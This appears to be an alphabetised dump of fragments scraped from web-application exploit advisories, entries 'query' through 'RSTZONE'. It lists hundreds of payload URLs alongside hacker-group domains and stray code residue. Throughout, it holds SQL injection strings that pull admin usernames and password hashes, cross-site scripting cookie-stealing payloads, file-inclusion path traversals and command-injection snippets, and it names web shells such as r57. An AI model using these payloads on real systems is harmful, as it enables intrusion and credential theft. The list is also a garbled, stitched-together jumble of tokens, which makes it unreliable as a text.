query.php?gfcommon=[Shell]
query.php?op=delquery&queryid=[SQL]&form=simple
query.php?page=2&order=severity.sort_order&sort=[SQL]
query.php?page=2&order=[SQL]
query.php?page=[SQL]
query.php?projects=[SQL]&op=doquery
questcms
question
question.php?ID=1%20UNION%20SELECT%20concat(user,char(58),password)%20FROM%20mysql.user%20
question.php?ID=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())
question.php?ID=1 UNION SELECT concat(user,char(58),password) FROM mysql.user
question.php?ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())
question.php?id=-513 union select version()  (Sql)
question.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())
question.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins
question.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())
question.php?quiz=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins
questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users--
[QuezzaPath]
quickadmin
quickcart
Quick.Cart
Quick.Cms
quickdev4php
QuickForm.php?includeFile=[EV!L]
quicklogin.php
quicknews
quickpolls
quick-polls-local-file-inclusion-deletion-vulnerabilities-cve-2011-1099
quickstart
quicktags
quicktalkforum)<
quinsonnas
quirm.net
quit.php
quixplorer
quixplorer.sourceforge.net
quiz
quizen
quiz.php?action=show&qzid=[]SQL INJECTION[]
/?quiz=quiz&univers=1&step=1&quiz_id=[SQL]
Quizz
quota_admin.php?gfwww=[Shell]
quota_management
quota_management-init.php?gfplugins=[Shell]
quota.php?gfwww=[Shell]
quota_project.php?gfwww=[Shell]
quotations
quote.php?forumID='%3C
quote.php?lng=cmd.php
quotes.php?Site_Path=[SHELL]
&quot;&gt;'&gt;" 
quran
qwiki
qx
R00T3RR0R
r00tDefaced.net                                     #
r141
r1.jpg
r2.jpg
r2kscripts
R3adIn.php
r3d.a20.ir
r3dm0v3.persianblog.ir               #
r3dm0v3.persianblog.ir",
r3dm0v3.persianblog.ir              #\n".
r3dw0rm.ir                                            #
r3dw0rm.ir *
R3dW0rm.ir                                            #
R3dW0rm.ir"
R3dW0rm.ir\n\r"
r3m1ck.us
r57.php?
r57.php cmd -r -p
 R57Shell
r57shell.php?
Ra1NX_bot'],
race_details.php?raceid=-9999+union+all+select+1,null,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users--
race_details.php?raceid=-9999+union+all+select+1,user_name,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users--
race_details.php?raceid=[ exploit ]
RadCLASSIFIEDS
radio
radioandtv.php?station=92 
radioandtv.php?station=93 
radioandtv.php?station=94
radio-istek-scripti-tr-.html
radminsuper=1
radykal-fancy-gallery
raidtracker_panel
Raja%20Guestbook
ramacms
ramoncastro.es
/?random=-2 UNION SELECT 1,2,3,concat(username,char(58),password,char(58),email),5+FROM+pas_users--
randomid_shell.php.jpg
randomid_yourshell.php
random_image.php?imgdir=..
randompic.php?files[0]=..
rankEm
rankings.php
rankings.php?style=..
rankup.asp?siteID=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
rankup.asp?siteID=<script>alert(1369)<
_rantevou_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
rapid
rapidshare.de
rashcms.GIF
rash-v1.2.2
rate%20my%20photo
ratefile.php?lid=2+DSecRG_INJECTION
ratefile.php?lid={number}">[code]
ratelink.php?lid=2+DSecRG_INJECTION
ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories
_rate_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
rate.php?action=rate&file=' union select 0,0,0,concat(username,user_password),0,0 from members--
rate.php?id=405+and+%28select%20version%28%29%29=5--
rate.php?id=[SQLi]
ratethread.php" method="post">
ratethread.php?tid='[sql_query]
rating
rating.php
rating.php?card_id=[SQL]
rating.php" method="post">
ravennuke230
raw.bplaced.net
/?rawURL=&lt;script&gt;javascript:alert();&lt;
Ray-v.3.5-Suite-Free
rayzzdemo
rayzz.net
rayzz_new_6726.rar  (Nulled)
raz0r.name
Raz0r.name
Raz0r.name )
razorcms
<razorcms_ip>:80
razorcms-server
rbxgallery
rbxslider
RCA.jsp?resourceid=10000624&attributeid=1900&alertconfigurl=
rcblog
rce.php'%23
rce.php?cmd=uname -a
rCGCsY
/?r=config&siteweb">
rdal_editor.inc.php?install_root=[Shell]
rdal_object.inc.php?install_root=[Shell]
rd.cycnus.de
react.nl
read
readAndCreateThumbs.php">
readbible.php?version=kjv%20union%20select%20@@version--
read_body.php?mailbox=
Reader.php?bkpwp_plugin_path=Shl3?
read_excel
 [Read_Excel_Path] 
readfolder.php?path=[path]&ext=[extension]
readimage.php?image=[php urlencoded path to file]
readings
readme
README%00
README%00&lng=..
README.html
README.html                                    +
README HTTP
readmore.php?news_id=readmore.php?news_id=-1%20'UNION%20SELECT%201,user_name,3,user_password,5,6,7,8,9,10,11%20from%20fusion_users
readmsg.php?mailbox=..
read.php?16,1971,1971#msg-1971
read.php?1,[MALICIOUS_SQL_CODE],newer 
read.php?action=lastpost&TID='
read.php?article_id=7
read.php?article_id=7#editcomments
read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--
read.php?catId=-1 UNION SELECT 1,concat(username,0x3a,password) FROM login--
read.php?catId={SQL}
read.php?id=-1'UNION ALL SELECT
read.php?id=1'+UNION+ALL+SELECT+1,2,3,4,5,concat(username,0x20,password),version(),user(),9+from+users--+
read.php?idm=1%20UNION%20ALL%20SELECT%201,username,password,4%20FROM%20user
read.php?recid=1' UNION ALL SELECT
read.php?TID=' 
readpm.php?op=del&ID=2&name=pruebas&user=waltrapass
readpm.php?op=del&ID=2&user=waltrapass 
readpm.php?op=read&ID=2&name=pruebas&user=waltrapass
readpm.php?op=read&ID=2&user=waltrapass
Ready2Edit
real
realadmin
Real Category Name!
realeastatephp.net
realestate
real_estate
real-estate
realestate20
realestate_contact.php
real_estate_details.php?id=sql
realestate-index.php?lang=en&tpl=default&mode=browse&cat_id=-1 UNION SELECT concat(login,0x3a,password) FROM realestate_admin--
realestate_portalscript.html
".$real['host'];
 real id
realink.org
realize.be
really-easy-slider
realn.free.fr
real.o-n.fr
 real p4ssw0rd";exit(-1); }
realPerson.html
realtor747
Realtor_Web
realtor_web_6
realty
Reaper
RebuildAudit.php?cmd=ls%20-la&GLOBALS[sugarEntry]=1&beanFiles[1]=ftp:
RebuildAudit.php?GLOBALS[sugarEntry]=1&beanFiles[1]=..
rebus
rebuslist
recaptcha\
receipt.php?BI=' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23
ReceiveReturn"<b><body onLoad="alert(document.cookie)"><br><div>><!--
receivertwo.php?uid=1&mohit=y'+union+select+user(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+from+alitalk_users+where+uid='1&turnadd=1&melody=0&lilil=400
recentchanges.php?nothing=nothing&page_no="><
recept
recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_email,4,5,6,7+from+fusion_users--+
recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_name,4,5,6,7+from+fusion_users--+
recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_password,4,5,6,7+from+fusion_users--+
recept.php?click=kategorier&kat_id=[ exploit ]
recherche.php">
rechnung.php?config[fsBase]=[evil_scripts]
recipe
recipe2.inc.php
recipe_calculator.php
recipedetail.php?id=[sqli]
recipe.inc.php
recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20
recipes
recipes.list.php
recipe_specifics.inc.php
recipes.php
Recipes_Website
recipes_website_1
reciphp
reciphp.png
reciprocal_links_manager.html
Recly
recommend.php?entryID='%3C
recommend.php?ID='%3C
recon
reconfig.php?GLOBALS[CLPath]=[evil_script]
record
record_company.php or Extras > Record Companies
recordings
RecordList
record.php?Dealer_ID=00000026 union all select 1,2,3,4,5,group_concat(Users_Name,0x3a,Users_Password,0x0a),7,8 FROM users--
record.rar
recordset.php
recruit_details.php?id=null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12+from+JaduAdministrators--
recruit_details.php?id=null+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12--
red_14
redakcni-system.maxsoft.cz
redaxo-cms-421-remote-file-inclusion.html
redaxo_path
redcms
redcomponent
redes-sociales
redir
redirect
Redirect...
REDIRECTION]
redirect.php?action=banner&goto= (SQL)
redirect.php?dlid=50&ENGINEsessID=4754ee8243de5f333ec74272f249b649 
redirect.php?plugins[]=..
redirect.php?_SERVER[DOCUMENT_ROOT]=
redirect.php?url='><script>alert(123);<
redirect.php?url=war%0d%0axe
Redirect...we don't want to alert xDD
redir.php?foaf=file.php
redir.php?id=-1%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11
redir.php?id=-1 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11
redir.php?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%79%61%68%6F
RedSecurity.COM
redshop
redsys
redweb.dk
","",$ref);
/?ref=123%27SQL_CODE_HERE
refer
reference
reference.class.php?path_om=[Shell]
reference.inc.php?source=log&section=styles&filterStyle=null union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user_name,0x3a,password),null,concat(realFirstName,0x20,realLastName) FROM users--
reference.inc.php?source=log&section=styles&styleNumber=null union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user_name,0x3a,password),null,concat(realFirstName,0x20,realLastName) FROM users--
referenzdetail.php?id=-6+union+select+1,2,3,4,5,6,concat(username,0x3a,userpassword),8,9,10,11+from+rcms_user
refer_friend.php?id=[SQL] 
referrals.php 	( Logged in )
referralUrl.php?offset=-1
referred_plans.php?ref_id=[SQL]
referred_plans.php?sort=id&order=asc&ref_id=[SQL]
refman
refund_request.php?orderid=SQL
regcheck_email.php?email=%3Cvideo%3E%3Csource%20onerror%3d%22javascript%3aprompt%28912327%29%22%3E
regdetailed
/?regevent_action=register&event_id=[gotcha]
$regexp
regged
reg.incl.php?Setting[OPT_includepath]=[-Sh3ll-]
register
register.class.php?system_path=[evil_scripts]
RegisterDomainPage.class.php?base_path=[evil_scripts]
RegisteredDomainsPage.class.php?base_path=[evil_scripts]
registerform.php
register.html
register.html.
register HTTP
register", HttpRequest::METH_POST);
register.inc.php?install_root=[Shell]
registerlandlord.php ) ( siteye uye ol )
register.php
register.php?
register.php"
register.php">
register.php";
register.php (2 register)
register.php?action=confirm&login='or 1=1 into outfile '
register.php?action=register";
register.php?action=registerer
register.php?aim="><script>alert(document.cookie)<
register.php?b=1 HTTP
register.php?config_skin=..
register.php?do=register2&domainname=%22%3E%3Cs
register.php?do=register" method="post"
register.php" enctype="application
register.php?fbusername="><script>alert(document.cookie)<
register.php?fmail="><script>alert(document.cookie)<
register.php?form_id=2'
register.php?icq="><script>alert(document.cookie)<
register.php?index=1
register.php", "", $InjectUserPost);
register.php?interebbies="><script>alert(document.cookie)<
register.php?lang=..
register.php?location="><script>alert(document.cookie)<
register.php" method="post">
register.php?mode='><script>alert(document.cookie)<
register.php?mode='[SQL-inj]
register.php?mosConfig_absolute_path=[evilcode]
register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-
register.php?register=yes&username=OverG&email=<scr*pt>alert%20
register.php?result=%3Cscript%3Ealert(
register.php?=>"'><ScRiPt>alert("Sweet")<
register.php?sex="><script>alert(document.cookie)<
register.php?sig=&lt;
register.php ---> SQLi on all POST Fields.
register.php?step=1&case=reg&PHPSESSID=fba9845f1d798c1bf4faf996e7789b4c
register.php?step=2&mode=create&case=reg (You Can Use Shell to Upload)
register.php to register new users. 
register.php?TPL_name=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B<
register.php?TPL_name=indoushka&TPL_nick=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(213771818860)%3B%3C
register.php?www="><script>alert(document.cookie)<
register.php?yim="><script>alert(document.cookie)<
register.php (you Can Upload your Evil)
register', reg_data)
register_succsess.inc.php?install_root=[Shell]
RegistrarModule.class.php?base_path=[evil_scripts]
registration
Registration.aspx
registration is now complete
registration.php?register=Register HTTP
registre.class.php?path_om=[Shell]
reg-new
regulars.php">
reguser.php method=post>
re_images
reject_entry.php?gfplugins=[Shell]
rejects.php
rekt-slideshow
related
related.class.php?system_path=[evil_scripts]
related-sites
relationship.php?path_to_find=0&pid1="><iframe>
relationship.php?path_to_find=0&pid1=&pid2="><iframe>
relationship.php?path_to_find="><iframe>
relative.nl
relay
release
Release
release-archive
release-candidate-1-v2-2-0-set-loose
released
releasenote.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]
releasenote.php?mosConfig_absolute_path=[kaMtiEz RoX]
Release_Notes
release_notes.html
releasenotes.php#4.5.2]. 
releasenotes.php#4.5.3
releases
releases.html
releases.kleophatra.org
reliz-imagecms-42-razgranichenie-prav-dostupa-i-drugie-novinki
relocate.php?<script>alert(document.cookie);<
relocate-upload
relocate-upload.php?ru_folder=asdf&abspath=RFI
 [remember the trailing slash noob]\r\n";
reminder
reminder.php
Reminder.php?searchtype=esearch&user=[yourusername]'%20or%20memberName='[otherusername] 
reminderservice
remository
remository?func=fileinfo&id=2
[remote code]
[remote code]%00
[remote code]%00 
remotefile
remote_host
[remote_location]
remote_location
[remote_path]
remote.php?uid=a&type=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00.jpg&creator_email=a
[remote-server]
remote-server
RemoteShell
removeCategoryResponse.php?CategoryID=-1' OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999.,NULL),NULL)))%23
removeCategoryResponse.php?CategoryID=-1' UNION SELECT '; ping localhost ;'%23
_REMOVED_
removefriend
remove http headers
removeItem.php?CartItemsID=-1' OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999.,NULL),NULL)))%23
removeItemResponse?ItemID=-1' OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999.,NULL),NULL)))%23
removeItemResponse.php?ItemID=.; ping localhost ;
remove.php?ID=-1+union+select+1,concat%28Email,0x3a,PasswordHash%29,3,4,5,6,7,8,9,10,11+from+php_email_man_Users--
remove.php?ID=[SQL]
remove.php" method="POST">
rempass.php?lang=[LFI]
rempass.php?lang=[RFI]
rename_form.php?server_id=0&dn=%22%3Cscript%3Ealert(&#039;r0t&#039;)%3C
renderers
render.UserLayoutRootNode.uP?uP_tparam=utf
render.UserLayoutRootNode.uP?uP_tparam=utf&utf
renew.php?user=[username]
reno
reno.php
rent-a-car
rentals
","").replace("FrontPage","").replace("WikiSandBox","")
<!----- REPLACE HEAR WITH URL ---->
rep-logs-daloradius.php?daloradiusLineCount=50&daloradiusFilter=<script>alert(document.cookie);<
replshare.php?ID=1+[SQL-INJECTION!]--%20-
reply
reply.asp?Forum_Id=3&Topic_Id=[SQL]
reply.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201
reply.php?forumid=1&threadid=1&fbpassword="><script>alert(document.cookie)<
reply.php?forumid=1&threadid=1&fbusername="><script>alert(document.cookie)<
reply.php?post=1&forum=1&topic=1&stop=2&image_subject="><script>alert('je viens de recuperer ton
reply.php?quote=&lt;
repo
repondre.php?id=>"><ScRiPt>alert(213771818860)<
report
report_customers.php" method="post">
report_customers.php?mode=report" method="post">
ReportDownloads.class.php?gfcommon=[Shell]
reporter
reporter.sql.php?mosConfig_absolute_path=
ReportGroupAdded.class.php?gfcommon=[Shell]
ReportGroupCum.class.php?gfcommon=[Shell]
report.htm
report_incidents_by_engineer.php" method="post">
report_incidents_by_site.php" method="post">
report_incidents_by_site.php?mode=report" method="post">
report_incidents_by_vendor.php?mode=1&startdate=%3Cscript%3Ealert%281%29;%3C
reporting
report_marketing.php" method="post">
report.php
report.php?default=1&server=Backup_inc' and 1='1	#TRUE
report.php?default=1&server=Backup_inc' and 1='2	#FALSE
report.php?gfplugins=[Shell]
report.php?id=-1
report.php?id=17281+union+select+concat(version(),0x3a,database(),0x3a,user()),2,3--
report.php?id=77917 and 1=null+union+select+version()
report.php?id=[BLIND]
report.php?id=null+union+select+version()
report.php?id=[SQL]
report.php?id=[SQL CODE]
report.php?id=[SQLi]
report.php" method="post">
report.php?postid=[SQL]
report.php?report=' (admin only)
ReportProjectAct.class.php?gfcommon=[Shell]
ReportProjectTime.class.php?gfcommon=[Shell]
reports
ReportSetup.class.php?gfcommon=[Shell]
reports.html.php?mosConfig_absolute_path=[evilcode]
reports.internic.net
ReportSiteAct.class.php?gfcommon=[Shell]
ReportSiteTime.class.php?gfcommon=[Shell]
ReportTrackerAct.class.php?gfcommon=[Shell]
ReportUserAct.class.php?gfcommon=[Shell]
ReportUserAdded.class.php?gfcommon=[Shell]
ReportUserCum.class.php?gfcommon=[Shell]
ReportUserTime.class.php?gfcommon=[Shell]
repository
repository_attachment.php?id_document=1%20union
repository_document.php?id_document=-3
repository_editdocument.php?id_document=-3
repository_links.php?id_document=-3
repository.openpolytechnic.ac.nz
repository.php?cmd=frameset&ref_id=1+and+ascii(substring((select+passwd+from+usr_data+limit+0,1),1,1))>50--
repository.php?cmd=frameset&ref_id=50438
repository.php?ref_id=50438&cmd=edit
reputation
reputation.php?pid='[sql_query]
"+req)
request
request_award.php
request.inc.php?install_root=[Shell]
requestit
request.php?..
request.php?l=admin&x=1
request.php?l=admin&x=1 AND 1=1    --> True
request.php?l=admin&x=1 AND 1=2    --> False
request.php?l=[USERNAME]&x=[SQLi]                      
request.php?l=[USERNAME]&x=[SQLi]         	          
requests
requests.php
required
res
resaopen.php?idresa=-1 UNION SELECT 1,2,3,4,5,6,concat(LoginUs,0x3a,PwdUs),8,9 FROM rp_user where IdUs=1--
resaopen.php?idresa=-99999
resaopen.php?idresa={SQL}
research
Research
researchguide
researchguide.sourceforge.net
research.html 
resellers&">
resellscripts.info
reservations
reservelogic
reset_admin_password_in_sweetrice_cms.html
reset&code[]
reset.php?code=[SQLi]
resetvote.php
resolv.conf
resolve.php?add1=%3Cscript%3Ealert(0)%3C
resource
resource=..
resource_categories_view.php?CLASSES_ROOT=[SHELL]
resources
resources\tutorials\import_products.html
responder.php?op=edit&id=-37'+Union+Select+version(),2,3--%20-#
ressource.class.php?path_om=[Shell]
ressources
restaurant.php?id=[num]
restaurant.php?id=[num] and(select 1 from(select count(*),concat((select (select @@version) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
restaurant-site-cms-script-demo
restore
result
[result]
resultimage.php
result.php?catid=[xxx]&sub_catid=[SQLi]
result.php?search= Viva%20Islam%20
result?q="onmouseover=prompt(906764) bad="
result?q="onmouseover=prompt(document.cookie) bad="
results
/?results=8c6ba611ea2a504da928c6e176a6537b']
results.htm
resultsignore.php?filename=
results?itag=wrx&q=$procura&kgs=1&kls=0&stq=$n") or next;
resultsMoreBuilds_buildReport.php?report_type=0&display_query_params=1&search_notes_string=<
results.php?category=-9999 and 1=0 union select null,version(),null,null,null--  [»]
results.php?category=[SQli]`						             [»]
results.php?Cat_ID=null++union+all+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--  #
results.php?id=-9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
results.php?pollid=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,0,1,2,3
results.php?query=%3CIMG+SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E 
results_table_web.php?quiz=-1+UNION+ALL+SELECT+1,2,concat(username,0x3A3A3A,password_hash),4,5,6,7+FROM+admins
results_table_web.php?quiz=-1+UNION+ALL+SELECT+version(),user(),concat(user(),0x3A3A3A,version()),database(),current_user(),6,database()
resume
retrieve-password
retrogod.altervista.org
retrogod.altervista.org<
retrogod.altervista.org                        #
retrogod.altervista.org                      #
retrogod.altervista.org                     #
retrogod.altervista.org")<
retrogod.altervista.org\n";
retrogod.altervista.org\n\n";
retrogod.altervista.org               |\r\n";
retrogod.altervista.org                |\r\n";
retrogod.altervista.org                             |\r\n";
retrogod.altervista.org                             *\r\n";
retrogod.altervista.org  *\r\n";
retrogod.altervista.org\r\n";
retrogod.altervista.org                              \r\n\r\n";
retrogod.altervista.org              \r\n\r\n";
retrogod.altervista.org\r\n\r\n";
retrogod.altervista.org"target="_blank">
return_dynamic_filters.php?filter_target=
 returns error about unknown entry
 returns no errors
")) return true; else return false; }
rev
Reverse_Polish_notation#The_algorithm_in_detail
reverse_shell_windows.php HTTP
revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SELECT%20null,null,SUBSTRING(administrators_pass,1,16),null,null%20FROM%20microcms_administrators
review.php?sbres_id=[sql] 
Reviews
reviews.add-edit.php
reviews.aspx?ProductID={bL!ND}
reviews.list.php
reviews.php?artid=..
reviews.php?browse='.$exec);
reviews.php?id='+union+select+1,concat(username,0x3a,password)
reviews.php?op=postcomment&id=1&title=%3Cscript%3Ealert();%3C
revision.php?repname=Zend+Framework&path=%2Fbranches%2F&rev=24971&peg=24971
revision.php?repname=Zend+Framework&path=%2Fbranches%2F&rev=24972&peg=24972
revision.php?repname=Zend+Framework&path=%2Fbranches%2F&rev=24973&peg=24973
revision.php?repname=Zend+Framework&path=%2F&rev=24975
revision.php?repname=Zend+Framework&path=%2F&rev=24976
revision.php?repname=Zend+Framework&path=%2F&rev=24977
revision.php?repname=Zend+Framework&path=%2Ftrunk&rev=24970&peg=24970
revista
revista-1.1.2.tgz?modtime=1025654400&big_mirror=0
revival.pl
RevokeBB
revokebb_users
revou
ReZEN
rezeptanzeige.php?currid=-9999%20union%20select%201,version(),3,4,5,6,7,8,9,10--
rezeptanzeige.php?currid=[SQLi]
rfc1867.c?r1=272374&r2=289990&view=patch (introduce max_file_upload)
rfc2616
rfc2616-sec14.html#sec14.4)
rfi_in_jaf_cms.html
rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
rfp
rg4_board
rgboard
RGboard
rgod
rgod.alte
rgod.altervista
rgod.altervista.org
rgod.altervista.org<
rgod.altervista.org <
rgod.altervista.org                            #
rgod.altervista.org                          #
rgod.altervista.org                        #
rgod.altervista.org"
rgod.altervista.org"                   target="_blank">
rgod.altervista.org"       target="_blank">
rgod.altervista.org"    target="_blank">
rgod.altervista.org"target="_blank">
rg_search.php?bbs_id=search&page_no=2&s_text=%22%3E%3Ca+href%3D%22http%3A%2F%2Fbalcanwarez.com%22%3E%3Ch1%3EOvdje nesto bezze upises,boli me kita :D%3C%2Fh1%3E%3C%2Fa%3E        
rhcuudvtuzv1i62ovp.png
#{rhost}
#{rhost}",
#{rhost}#{base}
#{rhost}:#{port}
#{rhost}#{port}#{uri}" },
ricerca.php
rich_files
rickeeweb.free.fr
right.php?title=[SQL]
_rights.php" method="post" name="main" >
ringmaker?start=[SQL] 
ringtones
ripe-hd-player
rips
rips-scanner
RI_SOS
ritecms.1.0.0.tinymce
ritsblog
rix
rjbike_new
rkrt_stats.php?refs,,Last_7,0,">[code] 
rmgs
rm -rf &patch_exe=..
 |\r\n";
                     |\r\n";
                         \r\n";
 \r\n";
..\r\n";
"\r\n";
)\r\n";
] 			    \r\n";
\r\n
\r\n" . 
\r\n";
			|\r\n";
\r\n",ip,def_port);
\r\n\r\n";
\r\n\r\n(.*)\{\"Friends
\r\n%s"
roberto
robitbt.hu
rockband.sourceforge.net
rocktronica
rodnaph
ro.inc.php?LANG=[evilc0de]
Role.class.php?gfcommon=[Shell]
RoleObserver.class.php?gfcommon=[Shell]
Roles
Roles_and_Capabilities
room
roommate
roomphplanning
room.php?rid=1+and+1=0--
room.php?rid=[SQL]
room.php?slc_lang=fa&sid=1&user_id=1
root
root@10.x.y.z 
root.email the following output is exposed
rootGui.inc.php?header=[evil_script]
rootGui.inc.php?header=[file] 
root@localhost:3336
rootsite.hu> [BNC]
rootsite.hu> staff & members, for happy moments
root-the.net 			#
root-the.net 				#
rosecms
RoseOnlineCMS_v3_B1.rar
rospora
rostermain
roundcube
roundcubemail
roundcubemail-0.2-alpha
roundcube.net
[roundcube_path]
rozwiazania_cms.php
rp_1.6
rpc
rpc.php?objectname=
rpc.php?objectname=Xmenu();phpinfo();die
rPdNCd
rpg
rpgmaster.de
rp-menu.php?_SESSION[sess_user]=<script>alert(123)<
rp-settings-users-edit-db.php?id=1";
rpSysAdmin?a=%3Cscript%3Ealert(&#039;www.eazel.es&#039;)%3C
rp_user
rqmkhtml.php?cmd=rqEditHtml&file=
rqmkhtml.php?cmd=rqEditHtml&file=[code]
rqmkhtml.php?cmd=rqEditHtml&file=[file]
rqmkhtml.php?cmd=rqEditHtml&file="><script>alert(document.cookie)<
rqms.sourceforge.net                  
RREP
rsccms
[rsccms_path]
rscms
rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--
rsdev.nl
rsgallery2.net
RSPA_File_Inclusion
rspa.sourceforge.net
rs.php?rootpath=[Evil_Script]
rss
rss 
Rss
RSS1.php?CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,3,4,5,6,7+from+DF2k_Members
RSS2.php?id=1&CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,user(),4,5,6,7,8,9,10+from+DF2k_Members
rss2.php?LangSet=cs';
RSS5.php?SubID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,3,4,5+from+DF2k_Members
RSS.asp" size="100" 
rss-coment_post.php?id=-1+UNION+ALL+SELECT+1,2,concat(memberName,0x3A3A3A,passwd),4,5,6,concat(memberName,0x3A3A3A,passwd),8+FROM+smf_members+WHERE+ID_MEMBER=1
rss-coment_post.php?id=-1+UNION+ALL+SELECT+1,2,concat(user(),0x3A3A,database()),4,5,6,version(),8
rss_feed.php?category=&#039;[SQL]&amount=10
rssfunctions.php?GLOBALS[modules_home]=..
rssonate.php?PROJECT_ROOT=[Evil_Script]
rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT  #
rss.php?cat[]
rss.php?cat=0[Sql-Code]
rss.php?cat=0+union+select+1,concat(username,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+ura_settings
rss.php?cat=-1+union+select+concat_ws(id,email,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--
rss.php?category=-1
rss.php?category= ' sql &#304;njection
rss.php?feedBox=Upcoming_Events&action=SwitchCal&selectedCal=1'+and+2-2='0 TRUE
rss.php?feedBox=Upcoming_Events&action=SwitchCal&selectedCal=1'+and+2-2='1 FLASE
rss.php?feedBox=Upcoming_Events&action=SwitchCal&selectedCal=[bSQL]
rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a
rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
rss.php?lang=..
rss.php?phpraid_dir=Evil-script?
rss.php?prefix=[LFI]
rss.php?_SERVER[DOCUMENT_ROOT]=
rss.php?t=vp&id=1'+AND+(SELECT+MID(o.password,1,1)+FROM+otatf_users+o+WHERE+o.id=1)='c
rss.php?t=vp&id=1'+AND+(SELECT+MID(o.password,1,1)+FROM+otatf_users+o+WHERE+o.id=1)='[first character of admin hash]
rss.php?user=2%27+UNION+ALL+SELECT+user(),2
rss-pic-comment.php?id=-1+UNION+ALL+SELECT+1,2,3,4,concat(memberName,0x3A3A3A,passwd),6,concat(memberName,0x3A3A3A,passwd),8,9,concat(memberName,0x3A3A3A,passwd),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat(memberName,0x3A3A3A,passwd),31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81+FROM+smf_members+WHERE+ID_MEMBER=1
rss-pic-comment.php?id=-1+UNION+ALL+SELECT+1,2,3,4,current_user(),6,user(),8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,version(),31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81
rss_reader
RssReader
rss-reader.php?lang=[LFI]
rsssearch.php?search=test&adv=1&scategory=123+or+1=1%29%23
RssSearchRenderer.class.php?gfwww=[Shell]
rss-simple-news
RST-CREW.NET
rst-crew.net ] \n\n";
".rstrip()
rst.void.ru
rst.void.ru 
rst.void.ru       |
rst.void.ru                     |
rst.void.ru                         #    |
rst.void.ru",
rst.void.ru)
rst.void.ru', -font => '{Verdana} 7')->pack();
rst.void.ru\n";
rstzone.net ]
rstzone.net]
rstzone.org
rstzone.org                        |
rstzone.org                                                    
RSTZONE.ORG
